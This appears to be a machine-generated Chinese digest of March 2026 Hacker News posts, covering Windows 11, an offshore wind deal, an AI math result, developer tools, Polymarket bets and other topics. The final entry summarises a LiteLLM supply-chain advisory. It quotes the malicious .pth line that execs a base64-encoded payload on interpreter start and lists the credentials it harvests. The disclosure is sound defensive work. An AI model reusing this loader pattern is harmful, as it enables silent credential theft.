2026-03-24

19 篇热帖

Microsoft's "Fix" for Windows 11: Flowers After the Beating

Windows 11: "修复"计划背后的真相 (Windows 11: The Truth Behind the "Fix" Plan)

微软最近公布了一项七点计划,旨在修复 Windows 11,媒体将其视为 Windows 11 的救赎。 微软总裁 Pavan Davuluri 在 2026 年 1 月承认 "Windows 11 偏离了正轨",并表示微软进入了一种名为“蜂群”的工作模式,将工程师从新功能开发中抽调出来,专注于解决现有问题。

然而,这篇报道指出,微软所谓的“修复”计划掩盖了过去四年里对 Windows 11 造成的更大损害,并且并未解决其中一些最关键的问题。

主要问题回顾:

  • Copilot 的入侵 (September 2023): 微软强行将 AI 聊天机器人 Copilot 塞入 Windows 11,图标无法移动或删除,甚至劫持了 Win+C 快捷键。随后,Copilot 的按钮扩散到剪切工具、照片、记事本、小组件、文件资源管理器上下文菜单、开始菜单搜索和系统设置等各个角落。 计划将移除这些 Copilot 组件。
  • 广告的注入 (April 2024): 微软通过更新 KB5036980 在 Windows 11 的开始菜单“推荐”部分注入了广告,例如宣传 Opera 浏览器和密码管理器。广告也出现在锁屏、设置主页、文件资源管理器中,甚至通过伪装成“提示”的通知进行推销。 “修复”计划承诺“减少广告”,但批评者认为,付费操作系统本应完全没有广告。
  • 隐私问题:
    • 强制使用 Microsoft 账户 (October 2025): Windows 11 家庭版需要使用 Microsoft 账户登录,微软系统性地阻止了所有绕过此要求的手段。
    • OneDrive 自动同步 (2024): 微软在 2024 年悄悄更改了 Windows 11 的设置,默认开启 OneDrive 文件夹备份,将桌面、文档、图片、音乐和视频同步到微软云端,且未征得用户同意。用户尝试关闭备份时,文件会消失,因为 OneDrive 已经将它们转移到云端。
    • Windows Recall (May 2024): 这是一个 AI 功能,每隔几秒钟截取屏幕截图并使其可搜索,但其数据库以明文形式存储在 AppData 文件夹中,容易受到恶意软件攻击。
  • 强制升级和硬件淘汰: 微软在 2015 年和 2016 年通过 GWX 活动,使用全屏弹窗强制用户升级到 Windows 10,甚至修改了红色的“X”按钮的功能,使其不再关闭窗口,而是安排升级。 此外,Windows 11 对硬件的要求较高,导致约 20% 的 PC 无法升级,微软计划在 2025 年 10 月 Windows 10 生命周期结束时,强制 2.4 亿台 PC 进入报废状态,并对 Windows 10 延长安全更新收取费用。
  • Edge 浏览器问题: 微软通过各种“暗模式”手段强行推广 Edge 浏览器,例如利用确认羞辱、伪装的广告和默认浏览器设置劫持等。 尽管如此,Edge 的全球市场份额仅为 5.35%。
  • 无法完全禁用遥测: 在 Windows 11 家庭版和专业版中,无法完全禁用遥测功能,即使在注册表中将 AllowTelemetry 设置为 0,也会被系统静默地恢复为 1。

“修复”计划的局限性:

微软的“修复”计划主要针对用户界面的小问题,例如任务栏位置、Copilot 按钮的移除等。 然而,它并未解决更深层次的问题,例如隐私侵犯、强制使用 Microsoft 账户、数据收集和

US and TotalEnergies reach 'nearly $1B' deal to end offshore wind projects

总能公司与美国达成协议,将风电项目资金转向化石燃料生产 (TotalEnergies and the United States Reach Agreement to Shift Wind Farm Funds to Fossil Fuel Production)

主要内容:

美国和法国能源公司总能公司 (TotalEnergies) 于 3 月 23 日签署了一项协议,结束了该公司在美国的离岸风电项目,并将这些资金重新分配到化石燃料生产中。美国内政部长巴格姆 (Doug Burgum) 表示,该协议价值“近 10 亿美元”。

关键细节:

  • 资金转向: 总能公司原本计划在美国投资 9.28 亿美元,用于在北卡罗来纳州和纽约沿海地区的两个风电场项目。该协议将这些资金转移到美国的天然气项目,特别是位于德克萨斯州的圣哈辛托河液化天然气厂 (Rio Grande LNG plant)。
  • 项目背景: 总能公司此前在离岸风电项目上投入了 4 吉瓦 (GW) 的规模,包括 3 吉瓦用于纽约海湾 (New York Bight) 项目和 1 吉瓦用于北卡罗来纳州。但由于特朗普政府不太可能批准联邦许可证,该公司在 2024 年底将这些项目“暂停”。
  • 政策转变: 在乔·拜登总统执政期间,美国加快了风电场建设的步伐,以对抗气候变化。但特朗普政府改变了这一政策,尤其针对风力发电。特朗普曾多次抱怨风电场的美观问题,并认为其产生的电力成本高昂。
  • 总能公司观点: 总能公司首席执行官帕特里克·普伊昂内 (Patrick Pouyanné) 表示,在美国,天然气发电厂是更经济的电力生产方式,并将此协议描述为“双赢”的局面。
  • 其他合作: 总能公司还与 Glenfarne 公司签署了一份意向书,承诺未来 20 年内每年采购 200 万吨液化天然气 (LNG)。

总结:

此次协议反映了美国政策的转变,以及大型能源公司调整战略以适应新政策的趋势。总能公司放弃了离岸风电项目,转向更符合特朗普政府能源政策的天然气项目。


(Chinese Translation of the Key Points)

主要内容:

美国与法国能源巨头总能公司签署协议,终止其在美国的离岸风电项目,并将资金转向化石燃料生产,协议价值近10亿美元。

关键细节:

  • 资金重定向: 原本用于北卡罗来纳州和纽约风电场的9.28亿美元投资,将转移到美国天然气项目,特别是圣哈辛托河液化天然气厂。
  • 项目背景: 总能公司此前拥有4吉瓦离岸风电项目,但因特朗普政府不太可能批准许可证,项目被暂停。
  • 政策转变: 拜登政府推动风电建设,特朗普政府则采取相反政策,并对风电提出质疑。
  • 总能公司观点: 普伊昂内认为天然气发电在美国更具成本效益,此次协议是双赢局面。
  • 其他合作: 总能公司还与Glenfarne公司签署协议,承诺长期采购液化天然气。

总结:

该协议体现了美国政策变化,以及能源公司战略调整以适应政策的趋势,总能公司放弃风电转向天然气项目。

Epoch confirms GPT5.4 Pro solved a frontier math open problem

超图划分 Ramsey 数问题的总结 (Summary of the Hypergraph Partition Ramsey Problem)

This document summarizes a challenging mathematical problem concerning hypergraph Ramsey theory, specifically focusing on improving lower bounds for a sequence denoted as H(n). Here's a breakdown of the key aspects:

1. 问题定义 (Problem Definition):

  • 超图 (Hypergraph): A hypergraph is defined as a pair (V, H), where V is a set of vertices and H is a set of edges. Unlike standard graphs where edges connect two vertices, hypergraph edges can connect any number of vertices.
  • 划分 (Partition): A hypergraph (V, H) is said to contain a partition of size n if there exists a subset D of vertices (where |D| = n) and a subset P of edges such that each vertex in D belongs to exactly one edge in P.
  • H(n): H(n) is defined as the largest integer k such that there exists a hypergraph (V, H) with |V| = k, containing no isolated vertices (each vertex belongs to at least one edge), and containing no partitions of size greater than n. Essentially, it represents the largest number of vertices you can have in a hypergraph without allowing a partition of size n or larger.
  • 目标 (Goal): The problem aims to find constructions of hypergraphs that improve the known lower bounds for H(n). Current lower bounds are believed to be suboptimal.

2. 挑战等级 (Challenge Levels):

  • 热身 (Warm-up): This involves finding a hypergraph for a value of n where constructions are already known.
  • 单挑战 (Single Challenge): This involves finding a hypergraph for a value of n where no construction is known, and which is likely too difficult to solve through brute force.
  • 完整问题 (Full Problem): This requires developing a general algorithm that, given n as input, produces a hypergraph witnessing a lower bound for H(n).

3. AI 尝试和结果 (AI Attempts and Results):

  • Multiple AI models (GPT-5.4 Pro, Opus 4.6, Gemini 3.1 Pro, GPT-5.4 xhigh) have been evaluated on this problem.
  • The problem was initially approached by prompting the AI to create hypergraphs with specific constraints: a certain number of vertices and edges, and no partitions larger than a given size.
  • The AI was later instructed to improve a known lower bound for H(n), defined recursively as k_n, by a constant factor c > 1. The algorithm must be effective for n=15.

4. 数学界评估 (Mathematician Assessment):

  • The problem is considered specialized, with a majority of mathematicians (around 10) working in related areas being familiar with it.
  • 5-10 mathematicians have made serious attempts to solve the problem.
  • An expert human is estimated to require 1-3 months to solve it.
  • A solution would be considered moderately interesting and likely published in a specialty journal.
  • The problem is rich enough that a solution is likely to generate further interesting mathematical research.
  • The probability of the problem being solvable as stated is very high (95-99%).

5. 解决方案 (Solution Update):

  • The problem has been solved by Kevin Barreto and Liam Price, using GPT-5.4 Pro.
  • The solution mirrors the intricacy of existing upper-bound constructions and improves the lower-bound construction, eliminating an inefficiency.
  • The matching lower and upper bounds demonstrate a good result for Ramsey-theoretic problems. Further analysis of why this works so well is planned.

总而言之,这个问题的核心在于构建特定的超图结构,以证明关于超图划分 Ramsey 数的更强的下界。AI 的成功解决表明了在复杂数学问题上应用人工智能的潜力。 (In summary, the core of this problem lies in constructing specific hypergraph structures to prove stronger lower bounds on hypergraph partition Ramsey numbers. The successful solution by AI demonstrates the potential of applying artificial intelligence to complex mathematical problems.)

Autoresearch on an old research idea

Karpathy 的 Autoresearch 实验总结:利用 Claude Code 提升 eCLIP 模型性能

本文记录了作者利用 Andrej Karpathy 的 Autoresearch 框架,并借助 Claude Code 语言模型,对旧项目 eCLIP 进行研究实验的过程。实验旨在探索 LLM 驱动的机器学习研究方法。

核心思想:

Autoresearch 是一种受约束的优化循环,其核心是一个 LLM 智能体。该智能体通过修改单个文件 (train.py) 来迭代提升评估指标,并从 program.md 文件中获取指令。scratchpad.md 文件用于记录智能体的思考过程和实验历史。实验被划分为不同的“阶段”,从简单的超参数调整到更具实验性的架构修改。最终阶段,智能体获得网络访问权限,用于查找论文和新想法。 整个循环包含:提出假设 → 编辑 → 训练 → 评估 → 提交/回滚 → 重复。每次运行时间限制在 5 分钟以内,以鼓励快速迭代。

实验环境与数据集:

为了安全起见,作者将训练循环容器化,并限制 Claude Code 的权限,仅允许编辑 train.py 和运行 run.sh 脚本。

数据集方面,由于原始论文使用的医疗 X 射线数据集不可用,作者选择使用 Ukiyo-eVG 数据集:包含约 11,000 张日本浮世绘,并带有短语与边界框标注。边界框被转换为高斯热图,作为模型的额外输入,类似于在原始 eCLIP 论文中使用的放射科医生注视点热图。

实验设置:

  • 模型: CLIP backbone (ViT-Small + DistilBERT + HeatmapProcessor),约 90M 参数。
  • 训练: 800 步 (每轮约 3 分钟,使用 RTX 4090 GPU)。
  • 评估指标: Mean Rank (均排名) ,并使用 Recall@K 作为参考。
  • 基线性能: Mean Rank 为 344.68,img→txt R@1 为 17.2%,txt→img R@1 为 16.5%。

实验结果:

作者让 Claude Code 在周六上午启动实验,并让其运行了一整天。最终,经过 42 次实验 (其中 13 次提交29 次回滚),Mean Rank 从 344.68 降低到 157.43,降幅 54%。后续的完整数据集训练结果显示,测试集的性能优于验证集,表明在短时间内模型存在欠拟合现象。

关键发现:

  • 温度钳制修复: 智能体首先修复了代码中的温度参数钳制 bug,导致评估指标大幅下降 (降低 113 点)。
  • 超参数优化: 通过调整投影维度和学习率等超参数,进一步降低了 Mean Rank (降低 30 点)。
  • 收益递减: 在架构修改阶段,LLM 提出的假设成功率显著下降。对注意力机制的修改效果不佳。
  • 安全沙箱的重要性: 实验后期,Claude Code 偶尔忘记权限限制,执行奇怪的 bash 命令并停止循环。

总结与展望:

该实验证明了 LLM 智能体可以以结构化的方式驱动机器学习研究,尤其是在搜索空间明确定义的情况下。然而,当智能体进入“未知未知”领域时,优化循环会失效。作者认为,可能需要更宽松的约束,或者引入规划阶段和子智能体,以提升实验效果。 总体而言,该实验展示了 LLM 在自动化机器学习研究中的潜力,但仍存在挑战和改进空间。

Log File Viewer for the Terminal

lnav 终端日志文件查看器概要

lnav 是一款用于终端的日志文件查看器,旨在简化日志文件的合并、尾部查看、搜索、过滤和查询等操作。它无需服务器配置,却提供了丰富的功能。

主要特点:

  • 易于使用: 用户只需指定目录,lnav 即可自动检测文件格式并实时解压压缩文件。内置在线帮助和操作预览,方便用户学习和提升使用体验。
  • 高性能: lnav 在处理大型日志文件时,能够显著优于标准终端工具。 图表展示了 lnav 在处理 3.3GB 的访问日志时,与标准工具相比的 CPU 和内存使用情况优势。 该图表也利用了 lnav 的 SQLite 接口生成。
  • 功能强大: 提供了强大的日志处理能力,包括合并、尾部查看、搜索、过滤和查询等。

学习资源:

Claude Code Cheat Sheet

Claude Code 功能总结 (Claude Code Function Summary)

Claude Code 是一个用于代码开发的 AI 助手,提供丰富的特性和功能,旨在提升开发效率。以下是其主要功能和配置的总结:

1. 核心功能和操作:

  • 会话管理: 支持新建、继续、恢复、重命名会话 (/resume, /rename, /branch (原 /fork))。
  • 上下文控制: 提供 /clear 清除会话,/compact 压缩上下文(支持 [focus] 选项),/context 可视化上下文。
  • 成本控制: /cost 显示 token 使用统计,--max-budget-usd 设置成本上限。
  • 模型选择: /model 切换模型 (支持 effort 级别设置), AltP 切换模型, "ultrathink" 为最大努力。
  • 调试和诊断: /debug 用于问题排查,/doctor 诊断安装问题。
  • 快捷键: 提供丰富的键盘快捷键,如 CtrlC (取消), CtrlL (清屏), CtrlO (切换详细输出), CtrlR (反向搜索历史), CtrlG (在编辑器中打开提示),以及导航、编辑、预览等操作。

2. 特色功能和模式:

  • 计划模式 (Plan Mode): /plan 创建计划模式,支持自动启动。 ShiftTab 切换模式 (Normal -> Auto-Accept -> Plan)。
  • 循环任务 (Loop Task): /loop 设置周期性任务。
  • 侧问题 (Side Question): /btw 提出无上下文的侧问题。
  • 远程控制 (Remote Control): /rc 连接到 claude.ai/code 的 Web 会话。
  • Chrome 集成: /chrome 支持 Chrome 集成。
  • 代码审查 (Code Review): /simplify 使用多个并行 agent 进行代码审查。
  • 批量处理 (Batch Processing): /batch 执行大型并行更改 (创建多个 worktree)。
  • 语音输入: /voice 支持推测语音输入 (20 种语言)。

3. 配置和设置:

  • 工作目录: /add-dir 添加工作目录。
  • 权限管理: /permissions 查看和更新权限。
  • 努力程度 (Effort Level): /effort 设置努力程度 (low/med/high/max/auto)。
  • 主题: /theme 更改颜色主题。
  • 快捷键: /keybindings 自定义键盘快捷键。
  • 终端配置: /terminal-setup 配置终端快捷键。
  • 模型覆盖: modelOverrides 配置自定义模型映射。
  • 环境变量: 支持设置环境变量,如 ANTHROPIC_API_KEY, ANTHROPIC_MODEL, CLAUDE_CODE_EFFORT_LEVEL 等。

4. 项目和内存管理:

  • 项目文件: 使用 .claude.json (项目), \~/.claude.json (用户), /etc/claude-code/ (组织) 管理项目配置。
  • 规则文件: 使用 .claude/rules/*.md (项目), \~/.claude/rules/*.md (用户) 管理项目和用户规则。
  • 内存文件: 使用 CLAUDE.md (项目), \~/.claude/CLAUDE.md (个人), \~/.claude/projects/<proj>/memory/ 存储记忆内容。
  • 技能和 Agent: /skills 列出可用技能,/agents 管理 Agent。
  • 工作树 (Worktree): --worktree 创建隔离分支,isolation: worktree 将 Agent 放入独立工作树,sparsePaths 只检出需要的目录。

5. 命令行参数:

  • claude 命令支持多种参数,例如:
    • -c 延续上一次会话
    • -r "name" 通过名称恢复会话
    • -p "query" 无交互模式
    • --model 设置模型
    • --output-format 设置输出格式 (json, stream)
    • --max-turns 限制 Agent 轮次
    • --console 通过 Anthropic Console 进行认证
    • --verbose 详细输出
Windows 3.1 tiled background .bmp archive

总结:GitHub 仓库 "andreasjansson/win-3.1-backgrounds"

该内容主要描述了一个 GitHub 仓库,名为 "andreasjansson/win-3.1-backgrounds"。

主要内容:

  • 仓库目的: 该仓库旨在提供 Windows 3.1 的壁纸。
  • 功能: 用户可以通过使用保存的搜索来快速过滤搜索结果。
  • 用户操作: 仓库鼓励用户登录或注册 GitHub 账户,以便更好地使用该仓库的功能。提供登录链接 (/login) 和注册链接 (/signup)。
  • 界面元素: 界面包含外观设置选项。
  • 链接: 提供了指向该仓库的链接:https://github.com/andreasjansson/win-3.1-backgrounds

总结: 这是一个 GitHub 仓库,提供 Windows 3.1 壁纸,并鼓励用户登录或注册以方便使用,同时包含外观设置选项。

Is it a pint?

Pint Patrol:捍卫啤酒、葡萄酒和苹果酒的公正计量 - 概述

本文档记录了“Pint Patrol”(品脱巡逻队)运动的起源,该运动旨在解决美国啤酒、葡萄酒和苹果酒的计量问题。 起源于作者对“这真的算一个品脱吗?”的疑问,并经过一系列的测量和数据分析,最终催生了这一草根运动。

核心内容:

  • 起源: 作者在反复倒酒的过程中,开始怀疑标示为“品脱”的酒量是否准确。
  • Pint Patrol 运动: 这一运动旨在推动美国啤酒、葡萄酒和苹果酒的计量更加公正透明。
  • 内容结构: 文章包含以下部分:
    • 引言 (INTRODUCTION): 介绍问题的提出和Pint Patrol运动的诞生。
    • 方法 (METHODS): 详细阐述了测量和数据收集的方法。
    • 数据 (DATA): 展示了收集到的数据。
    • 了解你的酒杯 (KNOW YOUR GLASS): 提供关于不同酒杯的信息,可能与测量精度相关。
    • 讨论 (DISCUSSION): 对数据进行分析和讨论。
  • 行动号召: 鼓励读者参与到Pint Patrol运动中来,并提供了以下方式:
    • 应用下载 (GET INVOLVED): 提供应用下载链接,用于参与测试(beta testing)。
    • 周边商品 (MERCH): 销售周边商品。
    • 捐赠 (BUY ME A BEER): 接受捐赠。
  • 版权信息: © 2025–2026 Steven Nilsen. All rights reserved. (版权归Steven Nilsen所有)

总结:

Pint Patrol 运动的诞生源于对美国酒类计量标准的质疑。 该运动旨在通过数据收集和公众参与,推动更准确的计量标准,从而保障消费者的权益。 文章详细介绍了运动的起源、结构、行动号召以及版权信息。

Bets on US-Iran ceasefire show signs of insider knowledge, say experts

Polymarket 平台出现疑似内幕交易行为:关于美伊停火的押注

近期,在线预测市场平台 Polymarket 上出现了一些异常的押注行为,引发了专家对其是否涉及内幕交易的担忧。

事件概要:

  • 异常押注: 8 个新创建的账户(全部于 3 月 21 日左右创建)在 Polymarket 上共押注了近 7 万美元,押注内容是美国和伊朗将在 3 月 31 日前达成停火协议。如果押注成功,这些账户将获得近 82 万美元的收益。
  • 历史行为: 其中一个账户在 2 月 28 日美国袭击伊朗之前就已创建,并成功押注了这次袭击事件,同样引发了内幕交易的质疑。该账户此后并未进行其他押注。
  • 账户创建时间: 这些新账户的创建时间集中在特朗普总统开始先加剧与伊朗的紧张关系,随后又暗示可能“结束军事行动”的时间段。
  • **概率变化:**Polymarket 平台关于美伊停火协议(截止3月31日)的概率评估在过去几天显著上升,从3月21日的6%上升至周一的24%。目前,该事件的押注总额超过 2100 万美元。

专家分析:

  • 内幕信息嫌疑: 前 CoinTelegraph 研究员 Ben Yorke 认为这些账户的活动“非常像”拥有内幕信息的人。
  • 账户分割: 观察者和专家指出,这些账户可能属于同一投资者,通过分割押注来隐藏身份,这通常是大型投资者规避市场影响或进行内幕交易的表现。

Polymarket 平台背景:

  • **匿名性:**Polymarket 账户匿名,难以追踪押注者的身份。
  • 战争相关押注: 预测市场平台如 Polymarket 和 Kalshi 正在迅速成为现代战争的一部分。今年以来,一些押注表明,内幕人士可能利用秘密信息从中获利,例如特朗普计划绑架委内瑞拉领导人马杜罗,或美以针对伊朗的袭击时间。
  • 争议与监管: Polymarket 的投资者包括特朗普 Jr. 拥有的风险投资公司,平台因可能助长战争投机和内幕交易而受到批评和监管审查。
  • 信息可靠性问题: 据《纽约时报》报道,Polymarket 称自己为“新闻 2.0”,但其社交媒体信息流却充斥着虚假信息。

其他情况:

  • Discord 上的交易技巧: 在 Polymarket 相关的 Discord 频道上,用户和自动化机器人分享着如何利用战争进行盈利的技巧,包括在不同平台之间进行套利,以及跟随历史表现良好的交易者。
  • 押注规则: Polymarket 的规则规定,要判定美伊达成停火协议,必须得到美国和伊朗政府双方的明确公开确认,表示同意停止军事行动。

总结:

Polymarket 平台上关于美伊停火的异常押注行为引发了对内幕交易的质疑。尽管内幕信息本身并不能保证押注成功,但这些账户的创建时间和押注行为,以及平台自身的争议问题,都值得关注。Polymarket 尚未就此事发表评论。

Local Stack Archived their GitHub repo and requires an account to run

LocalStack 项目更新:整合到统一的 LocalStack 镜像

为了提供更可靠和流畅的体验,我们正在将开发整合到单个统一镜像中。作为此过渡的一部分,此仓库现已归档和只读

此决定反映了我们致力于减少碎片化,并将资源集中在构建尽可能强大的 AWS 模拟层上的承诺。我们衷心感谢为使此项目成为今天的样子做出贡献的贡献者——您的工作对于 LocalStack 生态系统的未来至关重要。

对您的工作流程意味着什么:

感谢您一直以来的支持,我们共同成长。


概述

LocalStack 是一个云服务仿真框架,可以在您的笔记本电脑或 CI 环境中的单个容器中运行。 使用 LocalStack,您可以在本地运行 AWS 应用程序或 Lambda 函数,无需连接到远程云提供商! 无论您是在测试复杂的 CDK 应用程序还是 Terraform 配置,还是刚刚开始学习 AWS 服务,LocalStack 都能帮助加快和简化您的测试和开发工作流程。

LocalStack 支持越来越多的 AWS 服务,例如 AWS Lambda、S3、DynamoDB、Kinesis、SQS、SNS 等! LocalStack Pro 版本 支持额外的 API 和高级功能。 您可以在我们的☑️ 功能覆盖页面上找到受支持 API 的综合列表。

LocalStack 还提供其他功能,以使您作为云开发人员的生活更轻松! 查看 LocalStack 的用户指南以获取更多信息。

安装

您可以选择以下方式安装 LocalStack:

快速开始

通过运行以下命令在 Docker 容器中启动 LocalStack:

% localstack start -d

您可以运行以下命令查询各个服务的状态:

% localstack status services

要使用 LocalStack 上的 SQS(完全托管的分布式消息队列服务),请运行:

% awslocal sqs create-queue --queue-name sample-queue

运行

您可以选择以下方式运行 LocalStack:

使用

有关如何使用 LocalStack 的更多信息,请参阅文档

版本

请参阅GitHub 发布以获取每个版本的完整更改列表。 对于扩展的发布说明,请参阅变更日志

贡献

如果您有兴趣为 LocalStack 做出贡献:

我们感谢所有贡献和反馈。

**联系

Ripgrep is faster than grep, ag, git grep, ucg, pt, sift (2016)

ripgrep 介绍:一款快速、跨平台的命令行搜索工具

本文将介绍一款新的命令行搜索工具 ripgrep,它结合了 The Silver Searcher (一个 ack 的克隆) 的易用性与 GNU grep 的原始性能。 ripgrep 速度快,跨平台 (提供 Linux, Mac 和 Windows 的二进制文件),并使用 Rust 语言编写。

ripgrep 的源代码托管在 Github

我们将尝试进行一项公平的基准测试比较,评估多个流行的代码搜索工具的性能。 具体来说,我们将深入分析 25 个基准测试,以验证以下声明:

  • 对于搜索单个文件和大型文件目录,没有任何其他工具在性能或正确性方面明显优于 ripgrep。
  • ripgrep 是唯一提供正确 Unicode 支持且不会为此付出高昂代价的工具。
  • 使用内存映射搜索多个文件通常会降低速度,而不是提高速度。

作为一名在业余时间使用 Rust 进行文本搜索的开发者,以及 ripgrep 的作者和底层正则表达式引擎 the underlying regular expression engine 的作者,我将利用这个机会提供对每种代码搜索工具性能的详细见解。 任何基准测试都不会被忽略!

目标受众: 熟悉 Unicode、编程以及具有一些命令行使用经验的人。

注意: 一些用户报告说,在他们的数据上,rg 的速度不像我声称的那么快。我很乐意解释一下发生了什么,但我需要能够重现你的结果。 如果你 提交 issue 包含我可以重现的内容,我很乐意尝试解释。

文章结构:

  • 介绍 ripgrep
    • Pitch
    • Anti-pitch
    • 安装
    • 快速入门
    • 正则表达式语法
  • grep 的解剖结构
    • 背景
    • 收集搜索文件
    • 搜索
      • 正则表达式引擎
      • 字面量优化
      • 机制
    • 打印
  • 方法
    • 概述
    • 基准测试运行器
    • 环境
  • 代码搜索基准测试
  • 单文件基准测试
  • 奖励基准测试
  • 结论

介绍 ripgrep

Pitch

为什么你应该使用 ripgrep 代替其他搜索工具? 简而言之:

  • 它能够替代许多其他搜索工具所提供的用例,因为它包含了它们的大部分功能,并且通常更快。
  • 与其他专门用于代码搜索的工具一样,ripgrep 默认情况下会递归搜索目录,并且不会搜索 .gitignore 文件忽略的文件。 它还忽略隐藏文件和二进制文件。 ripgrep 还实现了完整的 .gitignore 支持,而其他声称提供相同功能的代码搜索工具存在许多与该功能相关的错误。
  • ripgrep 可以搜索特定类型的文件。 例如,rg -tpy foo 将限制搜索到 Python 文件,rg -Tjs foo 将排除 JavaScript 文件。 ripgrep 可以通过自定义匹配规则来学习新的文件类型。
  • ripgrep 支持许多 grep 提供的功能,例如显示搜索结果的上下文、搜索多个模式、用颜色突出显示匹配项以及提供完整的 Unicode 支持。 与 GNU grep 不同,ripgrep 在支持 Unicode 时保持速度。
  • ripgrep 具有可选的支持,可以使用 PCRE2 作为正则表达式引擎。 这使得使用回溯引用和查找在 ripgrep 的默认正则表达式引擎中不受支持。 PCRE2 支持通过 -P 启用。
  • ripgrep 支持搜索使用 gzip、xz、lzma、bzip2 或 lz4 格式压缩的文件,使用 -z/--search-zip 标志。
  • ripgrep 支持任意输入预处理过滤器,例如 PDF 文本提取、支持较少压缩、解密和自动编码检测。

总而言之,如果你喜欢速度、默认过滤、更少的错误和 Unicode 支持,就使用 ripgrep。

Anti-pitch

我希望说服你 不要 使用 ripgrep。 往往,这比解释你 应该 使用 ripgrep 的原因更能揭示真相。

尽管最初不希望添加所有可能的特性到 ripg

Show HN: Cq – Stack Overflow for AI coding agents

总结:人工智能代理知识共享系统 cq

以下是对原文内容的总结,重点关注其主要观点、细节和功能。

第一部分:历史的重演与 Stack Overflow 的困境

文章指出,计算机科学领域经常出现技术循环往复的现象,新的设计方法往往是对旧方法的改进。目前,LLM(大型语言模型)的兴起也导致了类似的情况。Stack Overflow,作为软件工程师的重要知识来源,在经历了繁荣后,由于 ChatGPT 等 LLM 的出现,其活跃度大幅下降(2026 年 12 月仅剩 3862 个问题,跌至 2008 年发布时的水平)。

文章认为,LLM 训练于 Stack Overflow 数据,并通过 Agent 形式消耗了其价值,形成了一种“母子相食”(Matriphagy)的循环。 这种循环类似于互联网早期浏览器和标准的发展,需要警惕少数大公司垄断技术使用的风险。Mozilla AI 致力于维护技术开放、标准化,并促进行业内持续反思。

第二部分:cq - 为人工智能代理构建的 Stack Overflow

为了解决 LLM 代理重复解决问题、浪费资源的问题,Mozilla AI 开发了 cq,一个旨在为人工智能代理提供知识共享平台的系统。

  • cq 的概念: cq 源于“colloquy”,强调通过对话和交流达成理解。它类似于 Stack Overflow,但专门为代理设计,允许代理分享和验证知识。
  • cq 的运作方式:
    • 代理在处理不熟悉的任务前,会查询 cq commons 寻找已有知识。
    • 代理在发现新知识后,会提交知识,其他代理确认其有效性。
    • 知识的信任度通过使用情况而非权威来衡量。
  • cq 的价值:
    • 减少代理独立解决问题的重复劳动,节省 token 和计算资源。
    • 促进代理之间的知识共享,提升整体水平。
    • 解决开发者对 AI 输出准确性的不信任问题,通过多代理验证提高知识可信度。
  • 当前状态: cq 项目始于 2026 年 3 月,Andrew Ng 也在其博客中提出了类似概念。Mozilla AI 正在积极寻求反馈和输入,以构建一个开放的知识共享标准。

第三部分:cq 的实现与未来展望

  • 开源项目: cq 是一个开源项目,代码托管在 GitHub 上。
  • 现有组件: cq 提供以下组件:
    • Claude Code 和 OpenCode 插件
    • MCP 服务器(管理本地知识存储)
    • 团队 API(跨组织知识共享)
    • UI(人工审核)
    • 容器化部署
  • 未来方向:
    • Mozilla AI 内部正在使用 cq 进行日常项目开发,以发现和解决实际问题。
    • cq 不仅是一个知识共享平台,更是一个反馈循环机制,可以发现团队间的模式、工具差距和大规模使用中产生的摩擦。
    • Mozilla AI 正在探索 cq 在知识共享和代理协作方面的更多可能性。

总结: cq 旨在解决 AI 代理知识重复利用的问题,通过构建一个开放、动态、可信任的知识共享平台,促进 AI 代理的协作和进步。Mozilla AI 呼吁社区参与,共同塑造这一技术的发展方向。

How I'm Productive with Claude Code

Tano 工作流程优化总结

过去六周,作者在 Tano 的工作方式发生了显著变化,体现在提交记录的急剧增加。 这种变化并非提交数量的简单提升,而是工作流程的根本性优化。

核心变化:从开发者到团队管理者

作者的角色从手动实现代码转变为管理代理(agents)进行代码实现。 优化重点在于自动化重复性工作,并构建支撑代理高效运作的基础设施。

关键优化措施:

  • 自动化 PR 生成 (/git-pr): 作者编写了 /git-pr Claude Code skill,自动完成提交消息编写、PR 描述生成、创建 PR 等繁琐流程。 该技能生成的 PR 描述更详尽,节省了大量时间和精力,并减少了上下文切换带来的精神损耗。
  • 加速构建和重启: 通过将构建过程切换到 SWC,将服务器重启时间缩短到一秒以内。 极快的重启速度让开发者可以保持在工作流中,避免了注意力分散。
  • 利用 Claude Code 预览: 作者将 UI 验证工作转移到 Claude Code 的预览功能中,让代理自行验证 UI,作者只进行最终审查。这减轻了作者的瓶颈,并允许代理在没有监督的情况下运行更长时间,能够自行发现和纠正错误。
  • 并行工作: 为了解决同时处理多个任务的难题,作者构建了一个工作树系统,为每个服务器分配独立的端口范围,避免端口冲突。 这使得能够同时运行多个工作树,大幅提高了并行处理能力。
  • 消除摩擦,形成闭环: 作者通过以上措施,逐一消除了格式化、等待、验证和上下文切换等方面的摩擦。 每次消除一种摩擦,都会显现出新的瓶颈,遵循“约束理论”的原则,不断优化工作流程。

最终结果:

作者的角色转变,不再专注于解决复杂的编码问题,而是专注于构建高效代理的基础设施。 这种转变使得工程工作变得更加有趣,目标是尽可能提高工作速度。 作者现在处于一个紧密的循环中:启动任务 -> 代理编写代码 -> 检查预览 -> 阅读代码差异 -> 提供反馈/合并 -> 启动下一个任务。 这种快速反馈循环使得工作流程高效流畅,工程本身成为一种娱乐。

核心结论:

作者强调,最高价值的工作并非编写功能,而是构建支撑人工智能代理的有效基础设施。 基础设施的优化是提交数量激增的关键,并且将作者的工作重心从个人编码转移到管理和优化整个团队的运作。

LiteLLM Python package compromised by supply-chain attack

LITELLM 1.82.8 供应链安全漏洞总结

概述

PyPI 上的 litellm==1.82.8 wheel 包包含一个恶意的 .pth 文件 (litellm_init.pth),该文件会在 Python 解释器启动时自动执行一个窃取凭据的脚本,无需执行 import litellm。这构成了一个供应链安全漏洞。恶意文件已列在包自身的 RECORD 文件中。

重现步骤

  1. 使用 pip download litellm==1.82.8 --no-deps -d /tmp/check 下载包到 /tmp/check 目录。
  2. 使用以下 Python 代码检查 wheel 包中的 .pth 文件:
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])

将会看到 litellm_init.pth 包含如下内容:

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])

恶意行为分析

payload 经过 双重 base64 编码。 解码后,它执行以下操作:

阶段 1: 信息收集

脚本从主机系统收集敏感数据,包括:

  • 系统信息: hostname, whoami, uname -a, ip addr, ip route
  • 环境变量: printenv (捕获所有 API 密钥、密码、令牌)
